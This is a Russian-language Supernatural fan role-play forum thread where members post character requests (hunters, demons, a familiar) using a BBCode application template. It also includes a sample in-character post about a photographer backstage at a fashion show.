Episode №1 - Sam Winchester
Episode №2 - Faust
Episode №3 - Euphoria Winchester
Episode №5 - Meg Masters
Episode №6 - Abaddon
Episode №7 - Loki
Episode №8 - Elisa Shayne
Episode №9 - Abigail West
Episode №10 - Cassiel
Episode №11 - Elisa Shayne
Episode №12 - Astarta




Supernatural: Heaven and Hell

Объявление

Объявление

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Supernatural: Heaven and Hell » |Actions| » Action о.1. I need you


Action о.1. I need you

Сообщений 1 страница 28 из 28

1

http://4.firepic.org/4/images/2013-02/25/hn7zcm9c84l5.png

Если Вам вдруг стало одиноко холодными вечерами и захотелось любви, страсти, а быть может и горячих разборок с приобретенными в чьем-нибудь лице врагами, то эта тема создана специально для Вас.

ЗАЯВКА
Код:
[quote][align=center]*изображение*[/align]
[quote][align=center][i]*предлагаемая внешность[/i][/align]
[align=center][img]http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png[/img]|[img]http://2.firepic.org/2/images/2013-02/25/y58cn0drjxy9.png[/img][/align][/quote]


[table layout=fixed width=100%]
[tr]
[td]
[align=center][font=Georgia][b]n[/b]ame[/font][/align]
[align=center][i]предлагаемое имя[/i][/align]
[/td]
[td]
[align=center][font=Georgia][b]r[/b]ace[/font][/align]
[align=center][i]предлагаемая раса[/i][/align]
[/td]
[td]
[align=center][font=Georgia][b]a[/b]ge[/font][/align]
[align=center][i]предлагаемый возраст[/i][/align]
[/td]
[/tr]
[/table][/quote]
[table layout=fixed width=100%]
[tr]
[td][quote][font=Georgia][align=center][b]Х[/b]АРАКТЕР[/align][/font]
[align=center][i]Желаемый характер [/i][/align]
[/quote][/td]
[td][quote][font=Georgia][align=center][b]Б[/b]ИОГРАФИЯ[/align][/font]
[align=center][i]Предложенная биография[/i][/align][/quote]
[/td]
[/tr]
[/table]
[quote][font=Georgia][align=center][b]В[/b]АШИ ОТНОШЕНИЯ[/align][/font]
[align=center][i]Желаемые отношения[/i][/align][/quote]
[quote][font=Georgia][align=center][b]П[/b]ОЖЕЛАНИЯ[/align][/font]
[align=center][i]Ваши пожелания к игроку[/i][/align][/quote]

0

2

http://s2.uploads.ru/gXK5u.gif

*Ian Somerhalder
http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png|http://2.firepic.org/2/images/2013-02/25/y58cn0drjxy9.png

name
Cole McGrath | Коул МакГрат

race
охотник

age
25 - 32 года

ХАРАКТЕР
Верность своим принципам, смелость, уверенность в себе – это, пожалуй, основные положительные качества Коула, которые порой стираются на фоне его самовлюбленности, хитрости, расчетливости, эгоистичности и мстительности. Он не привык считаться с чужим мнением, любит жить в свое удовольствие. Ему чуждо чувство жалости к своим жертвам, очень редко в нем просыпается сострадание и любовь, но такие чувства он пытается скрывать. Как истинный охотник, он любит сам процесс своей работы, в котором убийство нечисти для него – источник удовольствия и.

У Коула прекрасное чувство юмора, всегда оптимистичный и уравновешенный, в его голосе никогда не услышишь злости и раздражения, поэтому сложно определить, что он может выкинуть в следующую минуту. Он любит веселиться и проводить время в женском обществе.

БИОГРАФИЯ
Тут сами, пожалуй, только, у меня есть одно пожелание - возлюбленную Коула убил демон, после этого МакГрат и стал охотником.

ВАШИ ОТНОШЕНИЯ
возлюбленный в скором времени, возможно

ПОЖЕЛАНИЯ
приди, дорогой, и не на один день.

0

3

http://25.media.tumblr.com/tumblr_m7ogtnCnfy1rogdjyo1_500.gif

*emma stone
|http://2.firepic.org/2/images/2013-02/25/y58cn0drjxy9.png

name
имя на выбор, а фамилия не измена Chase (!)

race
человек, затем охотница

age
24-27 (ты должна быть старше)

ХАРАКТЕР
Свободолюбивая, самостоятельная и стервозная. Корпорация трех S. Терпеть не можешь идиотов, но одного терпишь и любишь - своего брата. Прямолинейная и грубая, редко заводишь друзей, но круг знакомых у тебя огромный. Ты пользуешься популярностью среди парней и можешь заставить любого плясать под твою дудку. Если узнать тебя поближе, то ты достаточно веселая и не такая уже и строгая, разве только нет рядом Тайлера, за которым нужен глаза да глаз.

БИОГРАФИЯ
Все свое детство была старшей сестрой, которой нужно заботиться о красавчике брате, о себе же была не высокого мнения. Не высокая девушка с веснушками и рыжими волосами -  "бяка". Любила быть мальчишкой, любила защищать младшего, считала это своей работой. В школе была зубрилой, но и погулять тоже была не прочь. Такая девочка "А". Когда время пришло поступать в университет - переехала куда по-дальше от забот. Ей было не до присмотра за мальчишкой - ловеласом, у которого успеваемость чуть выше двойки, да и девушки его девушку изрядно достали.
Спустя четыре года *тут имя* вернулась в родной город в качестве практикантки и устроилась в университет, чтобы выполнять свою работу старшей сестры, но все ее планы полетели коту под хвост, когда увидела, что ее далеко не преуспевающий братец в учебе стал намного лучше. Это и еще несколько фактов лишили Эмму (пусть пока так) удовольствия опекать своего непутевого братца, в связи чем она решает выяснить в чем же дело.

ВАШИ ОТНОШЕНИЯ
брата и сестры, но мой персонаж под чарами (ахах) демона. Так что могу быть даже лучше твоего истинного брата, хотя подозреваю ты захочешь изгнать демона и вернуть своего мальчика.

ПОЖЕЛАНИЯ
Появится и не пропадать) очень жду и буду любить http://s2.uploads.ru/CoXM4.gif

0

4

http://s3.uploads.ru/t/37H5V.gif

Shane West
http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png

name
Michael Sheridan| Майкл Шеридан

race
Человек|Охотник

age
29 лет

ХАРАКТЕР
Майкл спокойный и рассудительный человек. Старается в любой ситуации сдерживать свои эмоции и совладать с рвущимся наружу гневом. Но у мужчины не всегда это получается. Если его слишком разозлить или задеть за больное, эмоции потоком выливаются на провинившегося человека. После небольшого "взрыва" Шеридан мгновенно берет себя в руки и успокаивается, пытаясь уладить сложившуюся ситуацию.Именно за это качество Майкла многие любят и ценят. Добрый и отзывчивый человек. Никогда не откажет в помощи, нуждающимся, сделает все возможное и невозможное для этого. Веселый, любит шутить и почти всегда прибывает в хорошем расположении духа. Любитель поспорить, доказывая свою точку зрения, но поняв, что не прав, мужчина умеет признавать свои ошибки. В борьбе с нечистью ,как и любой охотник, жесток и кровожаден.

БИОГРАФИЯ
Оставляю право выбора за Вами.

ВАШИ ОТНОШЕНИЯ
После смерти отца Алекс решает уехать из дома и начать охотиться в одиночку. Конечно же сама девушка не справилась бы. Буквально сразу после того, как Бенсон покинула родной дом и отправилась на встречу приключениям, она познакомилась с одним из охотников- Майклом Шериданом . Мужчина знал когда-то ее отца и был обязан ему жизнью, именно поэтому Майкл не смог бросить Алекс одну, такую молодую и неопытную. Три года ребята охотились вместе, бок о бок, выручая друг друга из таких ситуаций, которые могли привести их к смерти. Их союз продолжался до тех пор, пока однажды Алекс не психанула на очередную проделку Майкла и не послала его куда подальше. Молодые люди сильно разругались и разъехались по разным концам страны. Майкл пытался как-то наладить сложившийся конфликт, но Алекс было невозможно переубедить. Конечно остыв, Бенсон пожалела о том, что вспылила, наговорила другу гадостей, но ее характер и принципы не позволяли ей позвонить и помириться с другом. Возможно девушка даже была влюблена в Майкла, кто знает, ведь раньше Алекс никогда не испытывала подобных чувств и не могла в себе разобраться.Через несколько месяцев молодые люди встретятся снова, в одном из баров. Поговорят и нормально выяснив отношения, помирятся. 

ПОЖЕЛАНИЯ
Стандарт.)) Не брать персонажа на 1 день, активная игра. Обещаю в свою очередь море любви и позитива. ;)

+1

5

http://s2.uploads.ru/x2aLd.gif

MATT BOMER
http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png

name
Gregory McKidd

race
человек

age
38 y.o

ХАРАКТЕР
♦ У него отличное чувство юмора;
♦ Если взялся за дело, то обязательно доведет его до конца;
♦ Проявлять физическую силу не любит, если только в крайнем случае.
Сначала они старается отговорить человека от его агрессивных намерений, урегулировать дело мирным путем.
И только если это совсем никак не выходит, бьет так, что мало не покажется.
♦ Всё, чего здесь нет - на Вашей фантазии (:

БИОГРАФИЯ
Детство в России пришлось на период коренных преобразований и нестабильности, политических переворотов и репрессий.
Папа – военный в отставке, с детства прививал мальчику любовь к Родине, патриотизм и чувство долга перед Отечеством.
Воспитанный по строгим моральным уставам, Грегорион же Григорий с детства стремился к идеалу; вечно анализируя и корректируя, русский парень скрупулезно ищет формулу совершенства, не забывая мирские радости.
Окончив школу с серебряной медалью, статный юноша поступает в архитектурный, который заканчивает с красным дипломом. Молодого перспективного специалиста мгновенно замечают и предлагают работу по контракту в Австралии, но, сделав свой выбор в пользу армии, он добровольно идет во флот.  Отслужив 4 года, выходит офицером. Вообще, у него все по жизни складывается неимоверно легко, словно сверху кто-то руководит его действиями.
Контракт с Сиднеем все еще в силе и, с трудом расставшись с Россией, МакКидд уезжает на покорение Австралии. Первое время находится в тумане, не сумев расстаться с воспоминаниями об Отчизне, потом состояние приходит в норму.
Семимильными шагами преодолевая карьерную лестницу, являясь центром всеобщего внимания и имея много друзей, Грегори все же внутренне замкнут и скован, что многие путают с «бычьим спокойствием и непоколебимостью».
До 38 лишь строит карьеру, но в душе все еще теплится мысль о создании крепкой, дружной семьи с любящей женой и любимым сыном. В это же время занимается активным поиском своих новых сторон, увлечений: в фотографии нашел отдушину.
Путешествуя по миру, задерживается в Канзасе, где его жизни суждено принять кардинальный поворот. Встреча с Элисой, буквально встрепенула его, выведя из забытья. Он раскрывается, проявляются разительные перемены в характере.

ВАШИ ОТНОШЕНИЯ
Мы сбегали друг к другу отовсюду и ото всех.
У нас были другие, мы жили подолгу врозь.
Но она любила только меня.
И каждый раз, когда я в этом убеждался…
В спальне, в гостиной, в кабинете, на полу в ванной…
Я был в ней и смотрел ей в глаза. Следил за каждым движением, за каждым моментом дыхания.
Чтобы она не забывала дышать, чтобы следя за ней, дышать не забыл яКристина Зияевна Хуцишвили

ПОЖЕЛАНИЯ
♦ Внешность персонажа подлежит изменению;
♦ Я прям требую, чтобы Вы активничалихотя бы в игре;
♦ Если Вам нужно связаться со мной - напишите в гостевой, я дам ICQ;
♦ Я закончила, жду
  http://s3.uploads.ru/D8vYR.gif

0

6

http://24.media.tumblr.com/tumblr_md8n1xyJGR1rggpceo1_500.gif

*Sebastian Stan (как вариант Max Irons )
http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png

name
Belial | Велиал

race
Высший демон

age
Много тысяч лет

ХАРАКТЕР
Могущественный Лорд лжи непомерно жесток и обаятелен. Неукротимый нрав вырывается на волю изощренными в своей жестокости деяниями. Жертвами становятся как особенные души, так и случайные. Невозможно заранее предсказать, когда Велиал снова вспылит и все обагрится кровью. С такими предпочтениями очень сложно выглядеть обаятельно, особенно, когда большая часть Ада знают, чем он занимается в свободное от управления кругом время. Многие отмечают, что среди архидемонов нет более корыстного и непоколебимого падшего. Хозяин V круга гордится своим положением в Аду, что так умело занял. Его слово – истина в первой инстанции, ведь он упрям и вспыльчив как бык. По праву голубой крови, текущей в венах, ему дано право властвовать и подчинять. К демонам в любом из кругов относится как к марионеткам на потеху. Порой они отягощают его жизнь, отвлекают от философских раздумий, что вызывает волну ненависти. Кучки пепла от сожженных подчиненных быстро убираются слугами, ведь смерть это не повод для мусора. Все, кто смог выжить в его компании дольше года, а таких немного, задумываются, какой же из грехов Велиал не впитал в себя. Многогранная натура с перепадами настроения, благодаря любимейшему греху. Принц Ада злопамятен, каждого демона знает по имени, помнит каждый проступок и кары его не избежать. Следит и насылает бедствия на голову провинившегося, в точности как Бог следит за людишками, и решает, кому жить, а кому гореть в адском пламени. Его вероломство вызывает страх и раболепие в глазах обитателей Ада. Перед людишками он предстает иным, лучезарным и мудрым. Личины, что сменяются время от времени, полны неестественной красоты и изящества. Но двуногие слишком глупы, чтобы разглядеть пустоту в том месте, где должно быть сердце. И как кровавый итог, мастер обмана манипулирует ими, а затем пожирает души. Нет приятнее времяпрепровождения, чем искажать Его замысел.

БИОГРАФИЯ
Велиал (Белиал, Белиаль, Велиар) - «суета», «ничто», «не-бог», один из самых сильных и злых демонов Сатаны. Велиал предстает перед людьми в обманчиво прекрасном облике. Его речь приятна на слух, но он лжив и вероломен. Велиал подбивает людей на греховные поступки, особенно на сексуальные извращения, похоть и прелюбодеяние. Древние иудеи считали, что Велиал был создан сразу после Люцифера и имел злую сущность от рождения. Он один из первых поднялся против Бога. После того, как он был изгнан с небес, он стал воплощением зла. Вейер полагал, что Велиал командовал 88 легионами демонов (по 6666 демонов в каждом) и был представителем дьявольских войск в Турции. При его вызове необходимо было принести жертву. Велиал часто нарушал обещания, но если кто-то добивался его расположения, тот был щедро вознагражден. Велиал был одним из наиболее почтенных демонов Сатаны. Еще до того как в Новом Завете главой темных сил преисподней был назван Сатана, Велиал уже достиг высокого положения. В одном из манускриптов Мертвого моря «Война сыновей света с сыновьями тьмы» Велиал предстает как единовластный правитель преисподней: «Ради разврата порожден ты, Велиал — ангел вражды. Ты и обитель твоя — тьма, а цели твои — сеять вокруг себя зло и боль». В конце концов Велиал спустился с небес, но у него так и осталось имя демона лжи. Мильтон запечатлел его в своей книге «Потерянный рай-II» следующим образом: «...Честные небес не покидают, казалось, что рожден он был благородным и для славных дел, но всебыло обманом и неправдой, хотя язык его обещал манну небесную и мог придать благовидность любому злодеянию, чтобы смутить и поразить любой разумный совет: так как помыслы его были низки, соблазнял он трудолюбивых, но робких к добрым делам и нерадивых до благородных поступков». Когда известный своими массовыми убийствами Жиль де Рэ попытался вызвать демонов, используя части рас- члененного тела убитого им ребенка, ему явились Вель- зевул и Велиал.

ВАШИ ОТНОШЕНИЯ
По началу отношения будут не простыми, на одной из встреч, ты захочешь меня убить, но почему-то не сделаешь этого и просто исчезнешь. В нашу следующую встречу, когда меня попытаются убить твои шестёрки, ты защитишь меня от них, скинув это на то, что из меня получится хороший союзник в дальнейшем. Но потом, у нас начнутся довольно тёплые и дружеские отношения, которые могут перерасти в любовь)

ПОЖЕЛАНИЯ
Не берите роль на один день, неделю, месяц.
После регистрации, хотелось бы обсудить нашу сюжетную линию.

Отредактировано Cassiel (2013-03-13 01:15:29)

0

7

http://25.media.tumblr.com/ee4f6684fb65007bd9b2b32a502616e6/tumblr_meyb3qBdvA1qbkl1no1_500.gif

Colin O'Donoghue
http://2.firepic.org/2/images/2013-02/25/jc1mrl3qxqsw.png

name
на выбор, к примеру буду называть Септимусом

race
предположительно фамильяр (превращается в кота), но можем обсудить

age
выглядит на 27-28, реальный на выбор;

ХАРАКТЕР
вообще, на твое усмотрение, но приблизительный набросок:
"Ты наглый, самовлюбленный, эгоистичный. Но да, обаятельности тебе всегда было не занимать, тут нечего скрывать. Но ты все равно всегда выводил меня из себя. Ты любишь высказываться довольно язвительно, смотришь на мир с иронией.
Ты эмоционален, ты не умеешь скрывать своих чувств. Всегда говоришь то, что думаешь. Ты прямолинеен.
Ты очень вспыльчив. Можешь наговорить лишнего и никогда не признаешь свою вину.
Но в то же время ты веселый, легкий в общении, душа любой компании. Ты умеешь хорошо относится к тем людям, которые тебе нужны. Да, ты всегда умел достать то, что тебе нужно."

БИОГРАФИЯ
тоже вполне менябельно, но вот набросок:
- немного старше Велиль;
- теперешний твой хозяин - уже не первый (второй или третий, не думаю, что больше). В отличии от Вел ты более опытен, о чм не забываешь напоминать на каждом шагу.
- превращаешься в кота (порода на выбор. в принципе, животное тоже, но кот предпочтительнее).
- завсегдатай в ведьминском баре, общаешься с многими ведьмами и фамильярами.

ВАШИ ОТНОШЕНИЯ
Наши отношения - типические отношения наших с тобой вторых обличий. Мы ссоримся и постоянно грыземся, в лучших традициях кошек-собак. Мы встретились относительно недавно, как по мерках фамильяров. Но ты уже успел меня достать своими подколками на счет моей "слишком правильности", замкнутости, недоверия.
Ты сразу не понравился, я, наверное, единственная имела иммунитет к твоему обаянию. Тогда-то все и началось.
Мы никогда не упускали возможности подколоть друг друга, а встречи всегда заканчивались какими-то спорами и ссорами.Но со временем все становилось еще хуже. Понемногу это ставновилось похоже на ненависть, хотя определенно ненавистью это назвать нельзя. Иногда становилось совсем что-то странное, как например, тогда, в один из вечеров, ты ведь помнишь?
На нас нашло что-то необъяснимое, хоть мы даже не были пьяны. Я до сих пор помню тот поцелуй.
Мы видимся почти каждый день и я уже просто не могу этого терпеть.
Я не могу однозначно описать наши с тобой отношения. Я люблю тебя? Да нет, конечно, что за бред? Я ненавижу тебя? Уже ближе, но все равно не то. Иногда при встречах мы можем относиться друг к другу абсолютно нейтрально, что бывает крайне редко, но чаще всего у нас случаются, то вспышки страшной ненависти, то вспышки страшной страсти.
Иногда мне кажется, что это такая извращенная форма любовных отношения, потому что несколько раз мы уже проводили долгие вечера вместе. Но потом я понимаю, что я крайне заблуждаюсь.
Мы не зависим друг от друга. Мы можем спокойно провести вечер в обществе друг друга и не встревать в жизнь друг друга несколько недель, а то и месяцев. Я абсолютно не могу понять, как отношусь к тебе. Но я уверена лишь в одном - находится поблизости нам опасно. Наши отношения совсем непредсказуемы.

ПОЖЕЛАНИЯ
По стандарту - роль на день-два не брать, без предупреждения не пропадать и меня не бросать. Вообще, я очень сговорчивая и все обсуждаемо.Если не нравится раса - можно просто оставить отношения, а с расой что-то придумать. Только появись и не пропадай, пожалуйста ** Уж заскучать не дам :з

Отредактировано Velile Appleton (2013-03-05 01:22:29)

0

8

http://s018.radikal.ru/i502/1303/e8/ba9483009130.gif

Taylor Warren. Просьба не менять. Потому что она – шикарна. И похожа на Вилле. Если возникнут проблемы с графикой, стучитесь ко мне. 

name
Alice Lenz. Прописано в анкете, лучше не менять. Фамилию вообще нельзя менять

race
человек

age
17. Только 17. Ни больше, ни меньше.

ХАРАКТЕР
Самостоятельная, уверенная в себе, замкнутая девушка. Почти все детство провела в атмосфере наркомании и абсолютного похуизма со стороны родителей, поэтому пришлось выкручиваться.  Любит большие компании, имела множество школьных друзей и знакомых.  Но была более менее порядочным ребенком – курить пробовала, пить пробовала, но пример сторчавшегося в конец отца, доведенного буквально до нервных срывов из-за пустяков и прочих прелестей влияния наркотиков, имеет острейшую «аллергию» к веществам любого рода.  Начитана, умна и является в их с отцом команде именно мозгом. Логик,  задавленный в детстве экстраверт,  гиперактивна – наследие  отца.  Умеет и любит готовить, стирать, убирать и вообще мечтает о жизни обыкновенного подростка.  Просто представьте себе ребенка, который до девяти лет жил в полнейшей жопе, без внимания, а потом в один момент потерял, любящую, но безответственную мать и получил взамен её не менее безответственного, но так же любящего и пытающегося исправить свои ошибки отца. 

БИОГРАФИЯ
Это фрагмент моей биографии, просьба не копировать, а именно писать от себя. Мой кусок – со стороны Валентина. И Элис в нем – как часть.
В Бостоне я поступил в институт искусств, работал фотографом-стажером в довольно известном доме мод.  Терракт, нервное потрясение и потеря уверенности в себе. Более тяжелые наркотики, и мне плевать на учебу. Внезапно объявляется старая подружка, мы не виделись, наверное, лет с 16. Она из Германии, Дженис. Приезжает не одна. С двухлетним ребенком. Моим. Испугавшись, бегу черт знает куда, ищу себе место.  Лоуэлл, небольшой городок. Подработка. И новое потрясение.
«Впервые узнал о том, что кроме людей на нашей планете туева хуча нечисти и нежити. Меня чуть не слопал один одичавший вампир, но кое-кто помог мне. Спасибо, Тони. Он охотник, опытный и умелый. Взялся меня обучать, как он только собирается терпеть мою тонкую творческую натуру, не понимаю. Этот мужчина спас меня, не дал стать чудовищем. Открыл глаза на мир».   
Дальнейшие события скручивают меня в какую-то бесформенную массу, и я до сих пор отхожу от этого. Я совершил убийство, которое гложет меня. Невинная молодая девушка. Я был зол, был на грани. На грани вампиризма. Тони спас меня, дав лекарство. Но девчонку не вернуть, хоть я не тронул ни капли её крови. 
Возвращаюсь к Дженис и ребенку, потому что не могу справиться с этой ношей один. Она приняла меня, безропотно и не требуя большего. Потому что сама находилась на дне. Я пришел к брошенной, побитой жизнью женщине. Я сам не блистал чистотой, марихуана и «одинокими грустными вечерами» героин. Странные картины, перепродажа наркотиков и нечисть как страшный сон, который невозможно забыть.  Только под кайфом я не боюсь засыпать. Четыре года мы живем в полудреме, а наш ребенок неизвестно как существовал. Я не могу бросить и её. Работаю, продаю вещи и картины.  На еду и на дозу. Жизнь ли это?  Я не знаю.  Нашему ребенку семь, она давно учится и выглядит вполне прилично. Такая самостоятельная. Или это Дженис очнулась, пока я спал?  Через пару лет прошлое дает о себе знать. Демоны. Черноглазые твари. Какого черта они забыли в Амберге, но моя жена была не в том месте и не в то время. Её тело как сосуд оприходовала какая-то демонесса. В безумии я разнес весь дом, не оставив камня на камне. Познакомился в баре с охотниками. Мне нужна была месть. И опыт.  Есть 27. А, значит, я могу самостоятельно охотиться.  С их помощью и благодаря дочери,  я просыпаюсь. От марихуаны не избавиться, уже привычка. Но я сторонюсь героина. Даже вечерами.  Моя дочь стала совсем взрослой, за восемь-то лет. Вернулись в Америку, исколесили полстраны, и я уже не верю в то, что мы найдем Дженис. Мою бедную Дженис Уэйд. Но Элис верит, и я не могу опустить руки. Надежда живет в ней, а я опасаюсь одного – Апокалипсис.

ВАШИ ОТНОШЕНИЯ
Любимая дочь, которой очень не нравится ни одно папино занятие. Скорее всего, где-то в глубине души, Элис его немного ненавидит. Потому что бросил и потому что должным образом не воспитывал лет до девяти. Когда уже стало поздно воспитывать. Валентин пытается сейчас компенсировать отсутствие заботы, но он сам больше ребенок, чем Элис. Поэтому, кто кого воспитывает – ещё не ясно. Элис – логик, а Валентин – типичнейший интуит. И Элис это бесит. Валентин пытается загладить свою вину перед дочерью, всячески защищает и охраняет дочь от охоты, но та и не рвется, просто помогает нерадивому родителю.  И хоть кажется, что Элис – приманка для демонов и её легко поймать и сделать предметом шантажа – это только кажется. Ленц-старший обучил дочь некоторым навыкам и иногда, вследствие её ужасной педантичности и другим чертам характера, которые она частично переняла от родителя, сам готов сдать это гиперактивное чудовище куда-нибудь.

ПОЖЕЛАНИЯ
Заполните полную анкету. Акционная для меня не покатит.  Совсем никак. Планы на игру у меня есть, и они вполне реализуемы. Надеюсь, что игра не застопорится на одном эпизоде и мы хорошенько пообщаемся вне форума. Не будьте молучнами, стучите ко мне в аську, я всем рад. 594286914

мой пост от лица валентина

Ну наконец-то. Её прорвало, и девушка просто вернулась в свою стихию, возмущенно щебеча всякую всячину. Вот так  бы и сразу. А между прочим, Ленц просто  не слушал её. Нет, механически до него доходили какие-то колебания волн. Даже немного с акцентом иногда, мягкий и совсем-совсем девчачий голос. Изредка его заглушал шум где-то на фоне, что-то среднее между музыкой для показов и матерной бранью волнующихся участников шоу. Блестящие лица маскировали хоть куда, неплохо бы и самому притворится какой-нибудь светской фифой, чтобы отштукатурили по полной программе. Маммадорогоая и всё такое прочее.  Раз, два, три, четыре, пять – с детства с техникой дружу. Экран фотоаппарата погас и перестал зажигаться после нескольких вкл\выкл. В голове пронеслось пара ахтунгов, умильных фразочек для бложиков и прочей несусветной дряни. И где посреди этого дурдома искать аппаратуру, а?
Действительно, не хватало какой-то травы для расслабления. Ни с того, ни с сего разболелась голова. Видимо, там внутри начался какой-то праздник, тараканы запустили очередную порцию салютов и  Вэл потерял  управление. Кажется, не только у фотоаппарата села батарейка. Где-то там, внизу, ругался желудок на своего хозяина, и явно не цензурной бранью. Ленц был готов ответить тем же, но во время опомнился – уши мадмуазель, что сейчас размышляла (что-то мышиное в этом есть)  вслух о преимуществах курортного отдыха на солнечных пляжах Италии и сумрачных бесконечных клубах. Окстись, девушка, я не похож на клубное существо! Да, клублюсь иногда дымком по углам своей мастерской, но не в том смысле, что ты привыкла думать.
- На какие шиши я б с тобой поехал, а? – Ленц продолжал крутить в руках неисправный аппарат, подумывая разбить его об стену и сказать, что это искусство и трогать мусор нельзя. Ой, не мусор – постановку! Ещё бы Франческу в центр композиции, так барахлить же будет. Нет, нет, нет.
- И кажется, мы отснимались, дорогуша.  Зря только на пол ложилась. Хотя, если ты умеешь колдовать, то, пожалуй, не откажусь от твоей помощи. Ибо он, - Вэл поболтал фотоаппаратом на манер маятника, - отказывается работать в подобных условиях. Только что помахал ручкой мне и исчез в недрах Матрицы.
Не заладилось  все сегодня с самого утра, нет, нет.  Карма плохая, что ли. Вот уже вечер,  самый наикрутейший показище на носу, вокруг столько юных звёзд, причем так близко, что за все секретные снимки, что можно было сделать, Ленц  как раз таки на Италию бы себе и скопил. Честность спасёт голову. Это у красоты там миссия Брюса Уилиса, спасти мир.  Так,  что за псевдоголливудские мыслишки.  Отставить. Валентин протянул руку девушке, помогая подняться.  Настроение, поднявшееся за пару минут, тут же упало. Что быстро находишь, то так же быстро и теряешь. Печально.
- А дальше я не знаю, что. Насколько я помню, у тебя на показе работы нет, а у меня ещё куча дел. И я сейчас попытаюсь справиться с этим безнадёжным бездельником. Буду надеяться, что у него просто села батарея. Вот и всё. – Ленц был более, чем расстроен несносным поведением своей техники. Поэтому, не прощаясь с Франческой, вышел в общую гримёрную, где модели и участники шоу ждали гримёров. Лениво прохаживаясь между мечущимися людьми, Вэл пробрался какой-то розетке у стены и, весь в надежде на разряженную батарею, выудил из кармана шнур для подзарядки.  Большого труда ему не составило развернуться и , держа аппарат в руках, наблюдать за происходящим. Кажется, ему сегодня всё быстро надоедает. Книга, фото, подруга… Так, стоп! Где книга? Бордовая обложка, толстенный фолиант?!  О, нет. Расстроено вздохнув, Ленц прислонился к стене. Найти её в такой суматохе не-воз-мо-жно.  Вот как разбил бы фотоаппарат об пол сейчас со всей злостью! И растоптал, растоптал.  О,  заработал с перепугу! Ну надо же, какая прелесть.  Включённый заново аппарат почти с какой-то своей механической улыбкой моргал Ленцу. Надо меньше курить. Всем. По гримёрке разнёсся запах табака из сигаретки, закуренной одной весьма не соблюдающей правила блондинки. Кажется, одна из участниц  икс-фактора, не иначе. Модели редко себе позволяют курить здесь. Спрятав обиженную (или завидующую?) мину за фотоаппаратом, Вэл запечатлил девушку с сигаретой в руке. Как непринуждённо! Вот, Франческа, учись! Только Валентин успел щёлкнуть нарушительницу порядка, как она сорвалась и убежала из гримёрки, а потом вернулась в новом наряде. Да, шкодная. 
Зарядка раз, зарядка два. Не возвращаться к подружке что ли? Не дай Бог пойдет его искать! Нужно… Нужно спрятаться! Парик, шляпа, женщина! Да что угодно, Господи!  Но вскоре необходимость в камуфляже пропала – замелькали гримёры и визажисты вокруг моделей и артистов, скрывая своими торопящимися тушками Ленца. Йуху.   Больше не отвлекаясь на мысли о прятках, Вэл начал искать среди всевозможных моделей и артистов кого-то, за чем образ неплохо бы прицепиться и поискать вдохновения. Чья-то горящая, рыжая  голова привлекает внимание фотографа на мгновение. Кажется, девушка сильно волнуется. Ну ка-а-а-ак же Валик мимо пройдёт. Пока та прикрывает глаза, он делает пару снимков и вновь ставит аппарат на подзарядку. Оказывается, всё не так уж и плохо сегодня.

0

9

http://s2.uploads.ru/ZdHhL.gif

*Amber Heard|Эмбер Херд
http://2.firepic.org/2/images/2013-02/25/y58cn0drjxy9.png

name
Alexandra Neal|Александра Нил

race
Человек

age
25-27 лет

ХАРАКТЕР
Александра всю свою жизнь была и есть очень упрямой, самостоятельной и настойчивой девушкой. Не было почти еще ни одного случая в ее практике, когда бы она не смогла добиться того, что ей нужно. Такому упорному характеру порой можно только позавидовать, хотя именно эта же настойчивость очень часто раздражает некоторых людей, которые не слишком-то хотят выкладывать тайны какой-то девушке, пусть она и работает федеральным служащим. Благодаря же простоте и некоторой безбашенности ее непростого характера, Саня может быть отличным и верным другом, с которым очень просто и легко в любой ситуации, когда все рабочие моменты остаются уже на втором плане. Никакая чрезмерная настойчивость не может помешать, если у тебя есть очень крепкая дружба и хорошие друзья. Александра всегда готова отложить свои дела ради близких и родных людей, но даже для нее не чуждо чувство раздражение и некоторой зависти по отношению к людям, страдающим небывалым чувством гордости, лени, заносчивости, вредности и нахальству.

БИОГРАФИЯ
Александра Нил родилась в небольшом городке штата Луизианы. С раннего детства Саша была предоставлена сама себе, особенно, после рождения ее младшей сестры, хотя у нее есть еще один старший брат Кол, но именно это и воспитало в ней самостоятельность во всех своих делах и поступках, упорство и чувство гордости за саму себя. Семья у Саши среднестатистическая со стабильным доходом, поэтому они всегда позволяли себе съездить на отдых, купить новую машину или отдельный дом. Отец - владелец небольшого завода, а мать - менеджер. Но сама Саша всегда хотела быть кем-то более важной, более экстранормальной. Конечно, родители не очень одобряли этот выбор, считая это просто временной глупостью, но разве с ней можно поспорить? Проще согласиться.
Мать Александры всегда мечтала о том, чтобы ее дочь стала профессиональной актрисой и блистала в лучах славы с экрана телевизоров, но не тут-то было. Еще с ранних лет она увлекалась сериалами про полицейских, разных криминальных детективов и даже перечитал все книги Агаты Кристи и Артура Конан-Дойля. Пыталась найти пиратские клады, ссылаясь на достоверность написанного в "Острове сокровищ".
Училась Нил хорошо снаружи, но порой еле заставляла делать себя это изнутри, потому что хотелось вместо скучных уроков пойти погулять с друзьями, поэтому очень часто сбегала с уроков, хотя потом и отрабатывала все. Благодаря ее упорству и хорошим навыкам девушка закончила университет и стала работать в полицейской конторе в своем городе. Карьера ее быстро шла вперед и идет до сих пор. В колледже и университет у нее было очень много друзей, с которыми она и до сих пор поддерживает хорошие отношения, но и врагов было также не меньше, а с теперешней работой и вовсе. 

ВАШИ ОТНОШЕНИЯ
На первых порах раздражение, доля неприязни и недоверие, а потом дружба и все такое.

ПОЖЕЛАНИЯ
Стандартный набор.

0

10

http://24.media.tumblr.com/f1d7082fe91d76dc102c925e44083656/tumblr_mki2e8VfKz1rjku6ao1_500.gif

Genevieve Padalecki (Cortese)
http://2.firepic.org/2/images/2013-02/25/y58cn0drjxy9.png

name
Ruby | Руби

race
демон

age
28/700 с хреном х)

ХАРАКТЕР
Отчаянная стерва, которая ради достигаемой цели пойдет на любой риск. В тоже время в ней есть что-то такое притягивающее и загадочное. Даже несмотря на то, что она демон в ней проявляются зачатки чего-то человеческого. Она может сострадать, наверное, даже любить, но вероятней всего, что это лишь притворство. больше склоняюсь к вашей фантазии иканону, но в общих чертах я изъяснился х)

БИОГРАФИЯ
